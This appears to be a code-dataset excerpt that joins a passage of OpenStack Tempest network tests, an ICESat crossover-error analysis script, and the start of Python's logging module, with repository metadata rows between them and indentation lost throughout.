def _create_subnet_with_last_subnet_block(cls, network, ip_version):
if ip_version == 4:
cidr = netaddr.IPNetwork(CONF.network.tenant_network_cidr)
mask_bits = CONF.network.tenant_network_mask_bits
elif ip_version == 6:
cidr = netaddr.IPNetwork(CONF.network.tenant_network_v6_cidr)
mask_bits = CONF.network.tenant_network_v6_mask_bits
subnet_cidr = list(cidr.subnet(mask_bits))[-1]
gateway_ip = str(netaddr.IPAddress(subnet_cidr) + 1)
return cls.create_subnet(network, gateway=gateway_ip,
cidr=subnet_cidr, mask_bits=mask_bits)
@classmethod
def _get_gateway_from_tempest_conf(cls, ip_version):
if ip_version == 4:
cidr = netaddr.IPNetwork(CONF.network.tenant_network_cidr)
mask_bits = CONF.network.tenant_network_mask_bits
elif ip_version == 6:
cidr = netaddr.IPNetwork(CONF.network.tenant_network_v6_cidr)
mask_bits = CONF.network.tenant_network_v6_mask_bits
if mask_bits >= cidr.prefixlen:
return netaddr.IPAddress(cidr) + 1
else:
for subnet in cidr.subnet(mask_bits):
return netaddr.IPAddress(subnet) + 1
@classmethod
def _get_allocation_pools_from_gateway(cls, ip_version):
gateway = cls._get_gateway_from_tempest_conf(ip_version)
return [{'start': str(gateway + 2), 'end': str(gateway + 3)}]
def subnet_dict(self, include_keys):
return dict((key, self._subnet_data[self._ip_version][key])
for key in include_keys)
def _compare_resource_attrs(self, actual, expected):
exclude_keys = set(actual).symmetric_difference(expected)
self.assertThat(actual, custom_matchers.MatchesDictExceptForKeys(
expected, exclude_keys))
def _delete_network(self, network):
self.networks_client.delete_network(network['id'])
if network in self.networks:
self.networks.remove(network)
for subnet in self.subnets:
if subnet['network_id'] == network['id']:
self.subnets.remove(subnet)
def _create_verify_delete_subnet(self, cidr=None, mask_bits=None,
**kwargs):
network = self.create_network()
net_id = network['id']
gateway = kwargs.pop('gateway', None)
subnet = self.create_subnet(network, gateway, cidr, mask_bits,
**kwargs)
compare_args_full = dict(gateway_ip=gateway, cidr=cidr,
mask_bits=mask_bits, **kwargs)
compare_args = dict((k, v) for k, v in six.iteritems(compare_args_full)
if v is not None)
if 'dns_nameservers' in set(subnet).intersection(compare_args):
self.assertEqual(sorted(compare_args['dns_nameservers']),
sorted(subnet['dns_nameservers']))
del subnet['dns_nameservers'], compare_args['dns_nameservers']
self._compare_resource_attrs(subnet, compare_args)
self.networks_client.delete_network(net_id)
self.networks.pop()
self.subnets.pop()
@test.attr(type='smoke')
@test.idempotent_id('0e269138-0da6-4efc-a46d-578161e7b221')
def test_create_update_delete_network_subnet(self):
name = data_utils.rand_name('network-')
network = self.create_network(network_name=name)
self.addCleanup(self._delete_network, network)
net_id = network['id']
self.assertEqual('ACTIVE', network['status'])
new_name = "New_network"
body = self.networks_client.update_network(net_id, name=new_name)
updated_net = body['network']
self.assertEqual(updated_net['name'], new_name)
subnet = self.create_subnet(network)
subnet_id = subnet['id']
new_name = "New_subnet"
body = self.subnets_client.update_subnet(subnet_id, name=new_name)
updated_subnet = body['subnet']
self.assertEqual(updated_subnet['name'], new_name)
@test.attr(type='smoke')
@test.idempotent_id('2bf13842-c93f-4a69-83ed-717d2ec3b44e')
def test_show_network(self):
body = self.networks_client.show_network(self.network['id'])
network = body['network']
for key in ['id', 'name']:
self.assertEqual(network[key], self.network[key])
@test.idempotent_id('867819bb-c4b6-45f7-acf9-90edcf70aa5e')
def test_show_network_fields(self):
fields = ['id', 'name']
body = self.networks_client.show_network(self.network['id'],
fields=fields)
network = body['network']
self.assertEqual(sorted(network.keys()), sorted(fields))
for field_name in fields:
self.assertEqual(network[field_name], self.network[field_name])
@test.attr(type='smoke')
@test.idempotent_id('f7ffdeda-e200-4a7a-bcbe-05716e86bf43')
def test_list_networks(self):
body = self.networks_client.list_networks()
networks = [network['id'] for network in body['networks']
if network['id'] == self.network['id']]
self.assertNotEmpty(networks, "Created network not found in the list")
@test.idempotent_id('6ae6d24f-9194-4869-9c85-c313cb20e080')
def test_list_networks_fields(self):
fields = ['id', 'name']
body = self.networks_client.list_networks(fields=fields)
networks = body['networks']
self.assertNotEmpty(networks, "Network list returned is empty")
for network in networks:
self.assertEqual(sorted(network.keys()), sorted(fields))
@test.attr(type='smoke')
@test.idempotent_id('bd635d81-6030-4dd1-b3b9-31ba0cfdf6cc')
def test_show_subnet(self):
body = self.subnets_client.show_subnet(self.subnet['id'])
subnet = body['subnet']
self.assertNotEmpty(subnet, "Subnet returned has no fields")
for key in ['id', 'cidr']:
self.assertIn(key, subnet)
self.assertEqual(subnet[key], self.subnet[key])
@test.idempotent_id('270fff0b-8bfc-411f-a184-1e8fd35286f0')
def test_show_subnet_fields(self):
fields = ['id', 'network_id']
body = self.subnets_client.show_subnet(self.subnet['id'],
fields=fields)
subnet = body['subnet']
self.assertEqual(sorted(subnet.keys()), sorted(fields))
for field_name in fields:
self.assertEqual(subnet[field_name], self.subnet[field_name])
@test.attr(type='smoke')
@test.idempotent_id('db68ba48-f4ea-49e9-81d1-e367f6d0b20a')
def test_list_subnets(self):
body = self.subnets_client.list_subnets()
subnets = [subnet['id'] for subnet in body['subnets']
if subnet['id'] == self.subnet['id']]
self.assertNotEmpty(subnets, "Created subnet not found in the list")
@test.idempotent_id('842589e3-9663-46b0-85e4-7f01273b0412')
def test_list_subnets_fields(self):
fields = ['id', 'network_id']
body = self.subnets_client.list_subnets(fields=fields)
subnets = body['subnets']
self.assertNotEmpty(subnets, "Subnet list returned is empty")
for subnet in subnets:
self.assertEqual(sorted(subnet.keys()), sorted(fields))
def _try_delete_network(self, net_id):
try:
self.networks_client.delete_network(net_id)
except lib_exc.NotFound:
pass
@test.idempotent_id('f04f61a9-b7f3-4194-90b2-9bcf660d1bfe')
def test_delete_network_with_subnet(self):
name = data_utils.rand_name('network-')
body = self.networks_client.create_network(name=name)
network = body['network']
net_id = network['id']
self.addCleanup(self._try_delete_network, net_id)
subnet = self.create_subnet(network)
subnet_id = subnet['id']
body = self.networks_client.delete_network(net_id)
self.assertRaises(lib_exc.NotFound, self.subnets_client.show_subnet,
subnet_id)
self.subnets.pop()
@test.idempotent_id('d2d596e2-8e76-47a9-ac51-d4648009f4d3')
def test_create_delete_subnet_without_gateway(self):
self._create_verify_delete_subnet()
@test.idempotent_id('9393b468-186d-496d-aa36-732348cd76e7')
def test_create_delete_subnet_with_gw(self):
self._create_verify_delete_subnet(
**self.subnet_dict(['gateway']))
@test.idempotent_id('bec949c4-3147-4ba6-af5f-cd2306118404')
def test_create_delete_subnet_with_allocation_pools(self):
self._create_verify_delete_subnet(
**self.subnet_dict(['allocation_pools']))
@test.idempotent_id('8217a149-0c6c-4cfb-93db-0486f707d13f')
def test_create_delete_subnet_with_gw_and_allocation_pools(self):
self._create_verify_delete_subnet(**self.subnet_dict(
['gateway', 'allocation_pools']))
@test.idempotent_id('d830de0a-be47-468f-8f02-1fd996118289')
def test_create_delete_subnet_with_host_routes_and_dns_nameservers(self):
self._create_verify_delete_subnet(
**self.subnet_dict(['host_routes', 'dns_nameservers']))
@test.idempotent_id('94ce038d-ff0a-4a4c-a56b-09da3ca0b55d')
def test_create_delete_subnet_with_dhcp_enabled(self):
self._create_verify_delete_subnet(enable_dhcp=True)
@test.idempotent_id('3d3852eb-3009-49ec-97ac-5ce83b73010a')
def test_update_subnet_gw_dns_host_routes_dhcp(self):
network = self.create_network()
self.addCleanup(self._delete_network, network)
subnet = self.create_subnet(
network, **self.subnet_dict(['gateway', 'host_routes',
'dns_nameservers',
'allocation_pools']))
subnet_id = subnet['id']
new_gateway = str(netaddr.IPAddress(
self._subnet_data[self._ip_version]['gateway']) + 1)
new_host_routes = self._subnet_data[self._ip_version][
'new_host_routes']
new_dns_nameservers = self._subnet_data[self._ip_version][
'new_dns_nameservers']
kwargs = {'host_routes': new_host_routes,
'dns_nameservers': new_dns_nameservers,
'gateway_ip': new_gateway, 'enable_dhcp': True}
new_name = "New_subnet"
body = self.subnets_client.update_subnet(subnet_id, name=new_name,
**kwargs)
updated_subnet = body['subnet']
kwargs['name'] = new_name
self.assertEqual(sorted(updated_subnet['dns_nameservers']),
sorted(kwargs['dns_nameservers']))
del subnet['dns_nameservers'], kwargs['dns_nameservers']
self._compare_resource_attrs(updated_subnet, kwargs)
@test.idempotent_id('a4d9ec4c-0306-4111-a75c-db01a709030b')
def test_create_delete_subnet_all_attributes(self):
self._create_verify_delete_subnet(
enable_dhcp=True,
**self.subnet_dict(['gateway', 'host_routes', 'dns_nameservers']))
@test.attr(type='smoke')
@test.idempotent_id('af774677-42a9-4e4b-bb58-16fe6a5bc1ec')
def test_external_network_visibility(self):
body = self.networks_client.list_networks(**{'router:external': True})
networks = [network['id'] for network in body['networks']]
self.assertNotEmpty(networks, "No external networks found")
nonexternal = [net for net in body['networks'] if
not net['router:external']]
self.assertEmpty(nonexternal, "Found non-external networks"
" in filtered list (%s)." % nonexternal)
self.assertIn(CONF.network.public_network_id, networks)
subnets_iter = (network['subnets']
for network in body['networks']
if not network['shared'])
public_subnets_iter = itertools.chain(*subnets_iter)
body = self.subnets_client.list_subnets()
subnets = [sub['id'] for sub in body['subnets']
if sub['id'] in public_subnets_iter]
self.assertEmpty(subnets, "Public subnets visible")
class BulkNetworkOpsTestJSON(base.BaseNetworkTest):
def _delete_networks(self, created_networks):
for n in created_networks:
self.networks_client.delete_network(n['id'])
body = self.networks_client.list_networks()
networks_list = [network['id'] for network in body['networks']]
for n in created_networks:
self.assertNotIn(n['id'], networks_list)
def _delete_subnets(self, created_subnets):
for n in created_subnets:
self.subnets_client.delete_subnet(n['id'])
body = self.subnets_client.list_subnets()
subnets_list = [subnet['id'] for subnet in body['subnets']]
for n in created_subnets:
self.assertNotIn(n['id'], subnets_list)
def _delete_ports(self, created_ports):
for n in created_ports:
self.ports_client.delete_port(n['id'])
body = self.ports_client.list_ports()
ports_list = [port['id'] for port in body['ports']]
for n in created_ports:
self.assertNotIn(n['id'], ports_list)
@test.attr(type='smoke')
@test.idempotent_id('d4f9024d-1e28-4fc1-a6b1-25dbc6fa11e2')
def test_bulk_create_delete_network(self):
network_list = [{'name': data_utils.rand_name('network-')},
{'name': data_utils.rand_name('network-')}]
body = self.client.create_bulk_network(networks=network_list)
created_networks = body['networks']
self.addCleanup(self._delete_networks, created_networks)
body = self.networks_client.list_networks()
networks_list = [network['id'] for network in body['networks']]
for n in created_networks:
self.assertIsNotNone(n['id'])
self.assertIn(n['id'], networks_list)
@test.attr(type='smoke')
@test.idempotent_id('8936533b-c0aa-4f29-8e53-6cc873aec489')
def test_bulk_create_delete_subnet(self):
networks = [self.create_network(), self.create_network()]
if self._ip_version == 4:
cidr = netaddr.IPNetwork(CONF.network.tenant_network_cidr)
mask_bits = CONF.network.tenant_network_mask_bits
else:
cidr = netaddr.IPNetwork(CONF.network.tenant_network_v6_cidr)
mask_bits = CONF.network.tenant_network_v6_mask_bits
cidrs = [subnet_cidr for subnet_cidr in cidr.subnet(mask_bits)]
names = [data_utils.rand_name('subnet-') for i in range(len(networks))]
subnets_list = []
for i in range(len(names)):
p1 = {
'network_id': networks[i]['id'],
'cidr': str(cidrs[(i)]),
'name': names[i],
'ip_version': self._ip_version
}
subnets_list.append(p1)
del subnets_list[1]['name']
body = self.client.create_bulk_subnet(subnets=subnets_list)
created_subnets = body['subnets']
self.addCleanup(self._delete_subnets, created_subnets)
body = self.subnets_client.list_subnets()
subnets_list = [subnet['id'] for subnet in body['subnets']]
for n in created_subnets:
self.assertIsNotNone(n['id'])
self.assertIn(n['id'], subnets_list)
@test.attr(type='smoke')
@test.idempotent_id('48037ff2-e889-4c3b-b86a-8e3f34d2d060')
def test_bulk_create_delete_port(self):
networks = [self.create_network(), self.create_network()]
names = [data_utils.rand_name('port-') for i in range(len(networks))]
port_list = []
state = [True, False]
for i in range(len(names)):
p1 = {
'network_id': networks[i]['id'],
'name': names[i],
'admin_state_up': state[i],
}
port_list.append(p1)
del port_list[1]['name']
body = self.client.create_bulk_port(ports=port_list)
created_ports = body['ports']
self.addCleanup(self._delete_ports, created_ports)
body = self.ports_client.list_ports()
ports_list = [port['id'] for port in body['ports']]
for n in created_ports:
self.assertIsNotNone(n['id'])
self.assertIn(n['id'], ports_list)
class BulkNetworkOpsIpV6TestJSON(BulkNetworkOpsTestJSON):
_ip_version = 6
class NetworksIpV6TestJSON(NetworksTest):
_ip_version = 6
@test.idempotent_id('e41a4888-65a6-418c-a095-f7c2ef4ad59a')
def test_create_delete_subnet_with_gw(self):
net = netaddr.IPNetwork(CONF.network.tenant_network_v6_cidr)
gateway = str(netaddr.IPAddress(net.first + 2))
name = data_utils.rand_name('network-')
network = self.create_network(network_name=name)
subnet = self.create_subnet(network, gateway)
self.assertEqual(subnet['gateway_ip'], gateway)
@test.idempotent_id('ebb4fd95-524f-46af-83c1-0305b239338f')
def test_create_delete_subnet_with_default_gw(self):
net = netaddr.IPNetwork(CONF.network.tenant_network_v6_cidr)
gateway_ip = str(netaddr.IPAddress(net.first + 1))
name = data_utils.rand_name('network-')
network = self.create_network(network_name=name)
subnet = self.create_subnet(network)
self.assertEqual(subnet['gateway_ip'], gateway_ip)
@test.idempotent_id('a9653883-b2a4-469b-8c3c-4518430a7e55')
def test_create_list_subnet_with_no_gw64_one_network(self):
name = data_utils.rand_name('network-')
network = self.create_network(name)
ipv6_gateway = self.subnet_dict(['gateway'])['gateway']
subnet1 = self.create_subnet(network,
ip_version=6,
gateway=ipv6_gateway)
self.assertEqual(netaddr.IPNetwork(subnet1['cidr']).version, 6,
'The created subnet is not IPv6')
subnet2 = self.create_subnet(network,
gateway=None,
ip_version=4)
self.assertEqual(netaddr.IPNetwork(subnet2['cidr']).version, 4,
'The created subnet is not IPv4')
self.assertEqual(subnet1['gateway_ip'], ipv6_gateway)
self.assertEqual(subnet2['gateway_ip'], None)
body = self.subnets_client.list_subnets()
subnets = [sub['id'] for sub in body['subnets']
if sub['network_id'] == network['id']]
test_subnet_ids = [sub['id'] for sub in (subnet1, subnet2)]
self.assertItemsEqual(subnets,
test_subnet_ids,
'Subnet are not in the same network')
class NetworksIpV6TestAttrs(NetworksIpV6TestJSON):
@classmethod
def skip_checks(cls):
super(NetworksIpV6TestAttrs, cls).skip_checks()
if not CONF.network_feature_enabled.ipv6_subnet_attributes:
raise cls.skipException("IPv6 extended attributes for "
"subnets not available")
@test.idempotent_id('da40cd1b-a833-4354-9a85-cd9b8a3b74ca')
def test_create_delete_subnet_with_v6_attributes_stateful(self):
self._create_verify_delete_subnet(
gateway=self._subnet_data[self._ip_version]['gateway'],
ipv6_ra_mode='dhcpv6-stateful',
ipv6_address_mode='dhcpv6-stateful')
@test.idempotent_id('176b030f-a923-4040-a755-9dc94329e60c')
def test_create_delete_subnet_with_v6_attributes_slaac(self):
self._create_verify_delete_subnet(
ipv6_ra_mode='slaac',
ipv6_address_mode='slaac')
@test.idempotent_id('7d410310-8c86-4902-adf9-865d08e31adb')
def test_create_delete_subnet_with_v6_attributes_stateless(self):
self._create_verify_delete_subnet(
ipv6_ra_mode='dhcpv6-stateless',
ipv6_address_mode='dhcpv6-stateless')
def _test_delete_subnet_with_ports(self, mode):
slaac_network = self.create_network()
subnet_slaac = self.create_subnet(slaac_network,
**{'ipv6_ra_mode': mode,
'ipv6_address_mode': mode})
port = self.create_port(slaac_network)
self.assertIsNotNone(port['fixed_ips'][0]['ip_address'])
self.subnets_client.delete_subnet(subnet_slaac['id'])
self.subnets.pop()
subnets = self.subnets_client.list_subnets()
subnet_ids = [subnet['id'] for subnet in subnets['subnets']]
self.assertNotIn(subnet_slaac['id'], subnet_ids,
"Subnet wasn't deleted")
self.assertRaisesRegexp(
lib_exc.Conflict,
"There are one or more ports still in use on the network",
self.networks_client.delete_network,
slaac_network['id'])
@test.idempotent_id('88554555-ebf8-41ef-9300-4926d45e06e9')
def test_create_delete_slaac_subnet_with_ports(self):
self._test_delete_subnet_with_ports("slaac")
@test.idempotent_id('2de6ab5a-fcf0-4144-9813-f91a940291f1')
def test_create_delete_stateless_subnet_with_ports(self):
self._test_delete_subnet_with_ports("dhcpv6-stateless")
| true
| true
|
1c446f764905e7f9cd9f67b56684fdeee3bc714c
| 5,348
|
py
|
Python
|
crossover_finder.py
|
nbergam2021/ICESat_data_analysis_tools
|
46f4132d2b34efe9a21470cdbaddf195301cfcd3
|
[
"MIT"
] | 1
|
2019-11-27T20:41:31.000Z
|
2019-11-27T20:41:31.000Z
|
crossover_finder.py
|
nbergam2021/ICESat_data_analysis_tools
|
46f4132d2b34efe9a21470cdbaddf195301cfcd3
|
[
"MIT"
] | null | null | null |
crossover_finder.py
|
nbergam2021/ICESat_data_analysis_tools
|
46f4132d2b34efe9a21470cdbaddf195301cfcd3
|
[
"MIT"
] | null | null | null |
#crossover_finder.py
import numpy as np
import pandas as pd
import scipy.stats as stats
import glob
import os
import sys
def solve(line_list, box):
# input: [slope, intersect, other_stuff]
# output: [ [], [], [], [] ]
# Group slopes, compare lines within each group
# box is list of top bottom left right lat/lon lines
# 0 is left, 1 is right, 2 is top, 3 is bottom
# [a1, a2] where each is a point [x1, y1]
intersects = []
for i in line_list:
for j in line_list:
# if lines are different and have opposing slopes
if i != j and i[0]*j[0] < 0: #assuming slope is index 0
intersects.append(get_intersect(i, j))
line_list.remove(i)
for i in intersects:
if i[0] > box[0] or i[1] > box[2] or i[0] < box[3] or i[1] < box[1]: #checks if point is out of range
#intersects.remove(i)
pass
return set(intersects)
def get_intersect(point1, point2):
# slope/intercept form => [slope, intercept]
x = round( (point2[1]-point1[1]) / (point1[0]-point2[0]) , 3)
y = round( point1[0]*x + point1[1] , 3)
return ( x,y)
def get_error(alt):
df = pd.DataFrame(columns=['Number of Points', 'Range',
'Standard Deviation', 'Variance']) #initializes dataframe
for point in alt:
#appends each set of # of points, range, stdvar, and variance
if len(point) > 0:
df = df.append(dict(zip(df.columns,
[len(point), (np.max(np.array(point))-np.min(np.array(point))),
np.std(point), np.var(point)])), ignore_index=True)
return df
def magn(vector):
for i in range(len(vector)):
if vector[i] is None or vector[i] == np.inf or vector[i] == np.NINF:
vector[i] = 0
mag = np.sqrt(vector.dot(vector))
return mag
def lerp(lower, higher, intr):
diff = np.subtract(higher, lower)
if np.prod(diff[0:2]) == 0:
return None
magdiff = magn(diff[0:2])
intr_diff = np.subtract(intr, lower[0:2])
magintr = magn(intr_diff)
mag = magintr/magdiff
if mag>1:
return None
lerped = np.add(lower, mag * diff)
veri_diff = np.absolute(np.subtract(intr, lerped[0:2]))
veri = np.sqrt(veri_diff.dot(veri_diff))
#print("lower: ({0},{1}), higher: ({2},{3}), intr: ({4},{5}), veri: {6}".format(lower[0], lower[1], higher[0], higher[1], intr[0], intr[1], veri))
if veri < 50:
return lerped[2]
return None
def xovers(sort_list, line_list, intersections):
xovers = [] #initializes an empty array to store crossovers
for intr in intersections:
points = [] #initializes an array to store points at a crossover
for df in sort_list:
index = df.iloc[:,0].searchsorted(intr[0]) #gets ideal index
if index == 0: #accounts for out of bounding box point placement
lower = df.iloc[index,:] #sets lower bound of possible point
else:
lower = df.iloc[index-1,:] #sets lower bound of possible point
if index >= len(df.iloc[:,0]):
higher = df.iloc[index-1,:] #sets upper bound of possible point
else:
higher = df.iloc[index,:] #sets upper bound of possible point
#print("ideal x: {0}, low x: {1}, high x: {2}".format(intr[0], lower[0], higher[0]))
l = lerp(lower, higher, intr)
if l is not None:
points.append(l)
xovers.append(points) #appends points array to xovers
return xovers
def xover_error(file):
df_total = pd.read_csv(file, header=None) #saves complete dataframe O(n)
df_list = [group for _, group in df_total.groupby(3)] #separates dataframe by ground track O(n)
line_list = [stats.linregress(df.iloc[:,0],df.iloc[:,1])[0:2] for df in df_list] #creates a list of regression lines
intersections = solve(line_list, [np.min(np.array(df_total.iloc[:,0])), \
np.max(np.array(df_total.iloc[:,0])), np.max(np.array(df_total.iloc[:,1])), \
np.min(np.array(df_total.iloc[:,1]))]) #finds potential intersections
sorted_list = [df.sort_values(by=df.columns[0], kind='mergesort') for df in df_list] #sorts dataframes for binary search O(nlog(n))
xover_list = xovers(sorted_list, line_list, intersections) #creates a list of crossovers
error_data = get_error(xover_list) #creates a datframe of error
new_name = os.path.splitext(file)[0] + "_crossover_error.csv" #modifies original filename
error_data.to_csv(new_name, index=False) #saves csv to file of name new_name
return error_data, new_name #returns saved dataframe and new filename
def main():
input_length = len(sys.argv) #saves length of command line input
if input_length <= 1:
print ("please input a filepath") #gives error message for lack of input
else:
regex = sys.argv[1] #saves filename regex
file_list = glob.glob(regex) #saves list of filenames
i = 1 #variable for saving current position in list
for file in file_list:
output = xover_error(file) #saves new csv file and saves method output
print ("Saved new csv file with path: " + output[1])
print ("Output {0} of {1}".format(i, len(file_list)))
i+=1 #increases i to new index
if __name__ == "__main__":
main()
| 40.515152
| 150
| 0.619484
|
import numpy as np
import pandas as pd
import scipy.stats as stats
import glob
import os
import sys
def solve(line_list, box):
intersects = []
for i in line_list:
for j in line_list:
if i != j and i[0]*j[0] < 0:
intersects.append(get_intersect(i, j))
line_list.remove(i)
for i in intersects:
if i[0] > box[0] or i[1] > box[2] or i[0] < box[3] or i[1] < box[1]:
pass
return set(intersects)
def get_intersect(point1, point2):
x = round( (point2[1]-point1[1]) / (point1[0]-point2[0]) , 3)
y = round( point1[0]*x + point1[1] , 3)
return ( x,y)
def get_error(alt):
df = pd.DataFrame(columns=['Number of Points', 'Range',
'Standard Deviation', 'Variance'])
for point in alt:
df = df.append(dict(zip(df.columns,
[len(point), (np.max(np.array(point))-np.min(np.array(point))),
np.std(point), np.var(point)])), ignore_index=True)
return df
def magn(vector):
for i in range(len(vector)):
if vector[i] is None or vector[i] == np.inf or vector[i] == np.NINF:
vector[i] = 0
mag = np.sqrt(vector.dot(vector))
return mag
def lerp(lower, higher, intr):
diff = np.subtract(higher, lower)
if np.prod(diff[0:2]) == 0:
return None
magdiff = magn(diff[0:2])
intr_diff = np.subtract(intr, lower[0:2])
magintr = magn(intr_diff)
mag = magintr/magdiff
if mag>1:
return None
lerped = np.add(lower, mag * diff)
veri_diff = np.absolute(np.subtract(intr, lerped[0:2]))
veri = np.sqrt(veri_diff.dot(veri_diff))
if veri < 50:
return lerped[2]
return None
def xovers(sort_list, line_list, intersections):
xovers = []
for intr in intersections:
points = []
for df in sort_list:
index = df.iloc[:,0].searchsorted(intr[0])
if index == 0:
lower = df.iloc[index,:]
else:
lower = df.iloc[index-1,:]
if index >= len(df.iloc[:,0]):
higher = df.iloc[index-1,:]
else:
higher = df.iloc[index,:]
l = lerp(lower, higher, intr)
if l is not None:
points.append(l)
xovers.append(points)
return xovers
def xover_error(file):
df_total = pd.read_csv(file, header=None)
df_list = [group for _, group in df_total.groupby(3)]
line_list = [stats.linregress(df.iloc[:,0],df.iloc[:,1])[0:2] for df in df_list]
intersections = solve(line_list, [np.min(np.array(df_total.iloc[:,0])), \
np.max(np.array(df_total.iloc[:,0])), np.max(np.array(df_total.iloc[:,1])), \
np.min(np.array(df_total.iloc[:,1]))])
sorted_list = [df.sort_values(by=df.columns[0], kind='mergesort') for df in df_list]
xover_list = xovers(sorted_list, line_list, intersections)
error_data = get_error(xover_list)
new_name = os.path.splitext(file)[0] + "_crossover_error.csv"
error_data.to_csv(new_name, index=False)
return error_data, new_name
def main():
input_length = len(sys.argv)
if input_length <= 1:
print ("please input a filepath")
else:
regex = sys.argv[1]
file_list = glob.glob(regex)
i = 1
for file in file_list:
output = xover_error(file)
print ("Saved new csv file with path: " + output[1])
print ("Output {0} of {1}".format(i, len(file_list)))
i+=1
if __name__ == "__main__":
main()
| true
| true
|
1c446fd421650543e773be63c70c4dc902f1eb7a
| 78,556
|
py
|
Python
|
Lib/logging/__init__.py
|
KrishnaSai2020/cpython
|
07923f32b16ba39165a58a5f47e807ca04ae17aa
|
[
"CNRI-Python-GPL-Compatible"
] | 2
|
2020-06-22T07:22:12.000Z
|
2020-09-29T06:33:22.000Z
|
Lib/logging/__init__.py
|
jugmac00/cpython
|
2c2a4f3d8545784c6e4ca8128bfc706916080712
|
[
"CNRI-Python-GPL-Compatible"
] | null | null | null |
Lib/logging/__init__.py
|
jugmac00/cpython
|
2c2a4f3d8545784c6e4ca8128bfc706916080712
|
[
"CNRI-Python-GPL-Compatible"
] | null | null | null |
# Copyright 2001-2019 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""
Logging package for Python. Based on PEP 282 and comments thereto in
comp.lang.python.
Copyright (C) 2001-2019 Vinay Sajip. All Rights Reserved.
To use, simply 'import logging' and log away!
"""
import sys, os, time, io, re, traceback, warnings, weakref, collections.abc
from string import Template
from string import Formatter as StrFormatter
__all__ = ['BASIC_FORMAT', 'BufferingFormatter', 'CRITICAL', 'DEBUG', 'ERROR',
'FATAL', 'FileHandler', 'Filter', 'Formatter', 'Handler', 'INFO',
'LogRecord', 'Logger', 'LoggerAdapter', 'NOTSET', 'NullHandler',
'StreamHandler', 'WARN', 'WARNING', 'addLevelName', 'basicConfig',
'captureWarnings', 'critical', 'debug', 'disable', 'error',
'exception', 'fatal', 'getLevelName', 'getLogger', 'getLoggerClass',
'info', 'log', 'makeLogRecord', 'setLoggerClass', 'shutdown',
'warn', 'warning', 'getLogRecordFactory', 'setLogRecordFactory',
'lastResort', 'raiseExceptions']
import threading
__author__ = "Vinay Sajip <vinay_sajip@red-dove.com>"
__status__ = "production"
# The following module attributes are no longer updated.
__version__ = "0.5.1.2"
__date__ = "07 February 2010"
#---------------------------------------------------------------------------
# Miscellaneous module data
#---------------------------------------------------------------------------
#
#_startTime is used as the base when calculating the relative time of events
#
_startTime = time.time()
#
#raiseExceptions is used to see if exceptions during handling should be
#propagated
#
raiseExceptions = True
#
# If you don't want threading information in the log, set this to zero
#
logThreads = True
#
# If you don't want multiprocessing information in the log, set this to zero
#
logMultiprocessing = True
#
# If you don't want process information in the log, set this to zero
#
logProcesses = True
#---------------------------------------------------------------------------
# Level related stuff
#---------------------------------------------------------------------------
#
# Default levels and level names, these can be replaced with any positive set
# of values having corresponding names. There is a pseudo-level, NOTSET, which
# is only really there as a lower limit for user-defined levels. Handlers and
# loggers are initialized with NOTSET so that they will log all messages, even
# at user-defined levels.
#
CRITICAL = 50
FATAL = CRITICAL
ERROR = 40
WARNING = 30
WARN = WARNING
INFO = 20
DEBUG = 10
NOTSET = 0
_levelToName = {
CRITICAL: 'CRITICAL',
ERROR: 'ERROR',
WARNING: 'WARNING',
INFO: 'INFO',
DEBUG: 'DEBUG',
NOTSET: 'NOTSET',
}
_nameToLevel = {
'CRITICAL': CRITICAL,
'FATAL': FATAL,
'ERROR': ERROR,
'WARN': WARNING,
'WARNING': WARNING,
'INFO': INFO,
'DEBUG': DEBUG,
'NOTSET': NOTSET,
}
def getLevelName(level):
"""
Return the textual representation of logging level 'level'.
If the level is one of the predefined levels (CRITICAL, ERROR, WARNING,
INFO, DEBUG) then you get the corresponding string. If you have
associated levels with names using addLevelName then the name you have
associated with 'level' is returned.
If a numeric value corresponding to one of the defined levels is passed
in, the corresponding string representation is returned.
Otherwise, the string "Level %s" % level is returned.
"""
# See Issues #22386, #27937 and #29220 for why it's this way
result = _levelToName.get(level)
if result is not None:
return result
result = _nameToLevel.get(level)
if result is not None:
return result
return "Level %s" % level
def addLevelName(level, levelName):
"""
Associate 'levelName' with 'level'.
This is used when converting levels to text during message formatting.
"""
_acquireLock()
try: #unlikely to cause an exception, but you never know...
_levelToName[level] = levelName
_nameToLevel[levelName] = level
finally:
_releaseLock()
if hasattr(sys, '_getframe'):
currentframe = lambda: sys._getframe(3)
else: #pragma: no cover
def currentframe():
"""Return the frame object for the caller's stack frame."""
try:
raise Exception
except Exception:
return sys.exc_info()[2].tb_frame.f_back
#
# _srcfile is used when walking the stack to check when we've got the first
# caller stack frame, by skipping frames whose filename is that of this
# module's source. It therefore should contain the filename of this module's
# source file.
#
# Ordinarily we would use __file__ for this, but frozen modules don't always
# have __file__ set, for some reason (see Issue #21736). Thus, we get the
# filename from a handy code object from a function defined in this module.
# (There's no particular reason for picking addLevelName.)
#
_srcfile = os.path.normcase(addLevelName.__code__.co_filename)
# _srcfile is only used in conjunction with sys._getframe().
# To provide compatibility with older versions of Python, set _srcfile
# to None if _getframe() is not available; this value will prevent
# findCaller() from being called. You can also do this if you want to avoid
# the overhead of fetching caller information, even when _getframe() is
# available.
#if not hasattr(sys, '_getframe'):
# _srcfile = None
def _checkLevel(level):
if isinstance(level, int):
rv = level
elif str(level) == level:
if level not in _nameToLevel:
raise ValueError("Unknown level: %r" % level)
rv = _nameToLevel[level]
else:
raise TypeError("Level not an integer or a valid string: %r" % level)
return rv
#---------------------------------------------------------------------------
# Thread-related stuff
#---------------------------------------------------------------------------
#
#_lock is used to serialize access to shared data structures in this module.
#This needs to be an RLock because fileConfig() creates and configures
#Handlers, and so might arbitrary user threads. Since Handler code updates the
